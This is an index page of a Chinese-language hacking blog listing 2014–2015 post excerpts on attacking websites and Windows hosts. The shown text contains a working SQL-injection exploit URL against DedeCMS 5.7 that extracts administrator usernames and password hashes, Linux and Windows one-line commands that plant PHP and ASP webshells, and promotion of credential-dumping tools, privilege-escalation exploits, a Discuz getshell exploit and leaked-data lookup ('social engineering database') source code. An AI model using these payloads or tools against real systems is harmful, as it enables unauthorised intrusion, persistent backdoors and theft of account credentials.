DedeCMS 20140201 之前的5.7通杀

   
分类:安全 | 2015-01-28 | 撸过 6,812 次
2人扯蛋

无需注册会员账号:

Exp:plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\'
or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select
CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`
limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type]
[type]=application/octet-stream&[......]

继续阅读

Quarks PwDump各种32位64系统获取HASH

   
分类:安全 | 2015-01-10 | 撸过 8,699 次
0人扯蛋

Quarks PwDump 是一款开放源代码的Windows用户凭据提取工具,它可以抓取windows平台下多种类型的用户凭据,包括:本地帐户、域帐户、缓存的域帐户和Bitlocker。作者开发这个工具的原因是现在没有一款工具能同时抓取所有类型的hash和Bitlocker信息。这个工具没有注入任何进程,工作原理是神马呢,源代码值得读一下。

它目前可以导出 :
– Local accounts NT/LM hashes + history 本机NT/LM哈希+历史登录记录
– Domain accounts NT/LM hashes + history 域中的NT/LM哈希+历史登录记录
–[......]

继续阅读

Adminer 适合扒裤子的mysql工具

   
分类:工具 | 2014-12-23 | 撸过 5,508 次
0人扯蛋

Adminer是一个类似于phpMyAdmin的MySQL管理客户端。整个程序只有一个PHP文件,易于使用和安装。Adminer支持多语言(已自 带11种翻译语言文件,可以按自己的需求翻译相应的语言)。支持PHP4.3+,MySQL 4.1+以上的版本。

提供的功能包括:

1:创建,修改,删除索引/外键/视图/存储过程和函数。
2:查询,合计,排序数据。
3:新增/修改/删除记录。
4:支持所有数据类型,包括大字段。
5:能够批量执行SQL语句。
6:支持将数据,表结构,视图导成SQL或CSV。
7:能够外键关联打印数据库概要。
8:能够查看进程和关闭进程。
9:能够查看用户和权限并修改。[......]

继续阅读

wdcp面板爆严重漏洞附利用工具

   
分类:工具 | 2014-12-23 | 撸过 7,950 次
1人扯蛋

QQ截图20141223133538

[......]

继续阅读

cmd生成webshell语句

   
分类:安全 | 2014-12-11 | 撸过 3,942 次
2人扯蛋

linux:echo -e "<?@include(\\$_POST["c"]);?>" > webshell.cc.php 会再同目录下生成webshell.cc.php一句话 密码:c
win:      echo ^<%eval request("c")%^> >>webshell.cc.asp                   会再同目录下生成webshell.cc.asp一句话 密码:c

社工库源码搜集

   
分类:安全 | 2014-12-4 | 撸过 34,950 次
10人扯蛋

我接触的第一个社工库源码是Bamaba的源码 一个Asp+Sqlserver的源码 很简陋
社工库源码搜集

大概就是这个界面 13年前后的大多数社工库都是这个源码改的 包括第一代QQ群查询

asp+sqlserver 单表查询
[......]

继续阅读

ms08066提权 XP提权/2003提权

   
分类:工具 | 2014-10-1 | 撸过 6,142 次
4人扯蛋

6619296394211713340

 
[......]

继续阅读

Discuz! 7.2 SQL注入exp getshell版

   
分类:安全 | 2014-10-1 | 撸过 3,101 次
2人扯蛋

参数:

1.可直接getshell

2.爆管理账号密码

3.爆表前缀

如果表前缀不是默认的cdb_ 只需更改代码中的 $table即可,方便快捷。
[......]

继续阅读

K8大牛的C段旁注查询工具 V1.6

   
分类:安全 | 2014-08-8 | 撸过 7,946 次
0人扯蛋

全部复制作者BLOG的懒得写了~

-------------------------------------------------------------------------------------------------------------------------------------------

工具: K8_C段旁注查询工具 V1.6_20140618
编译: VS2012  C# (.NET Framework v4.0)
组织: K8搞基大队[K8team]
作者: K8拉登哥哥
博客: http://qqhack8.blog.163.com
发布: 2014/6/10 10:19:57

图片: 

V1.6  20140618 效果图  添加对应Banner的图标 这才是更直观 导入导出同样支持图标


[......]

继续阅读

子域名检测大师(自由博客)专版

   
分类:工具 | 2014-07-2 | 撸过 2,174 次
10人扯蛋

[......]

继续阅读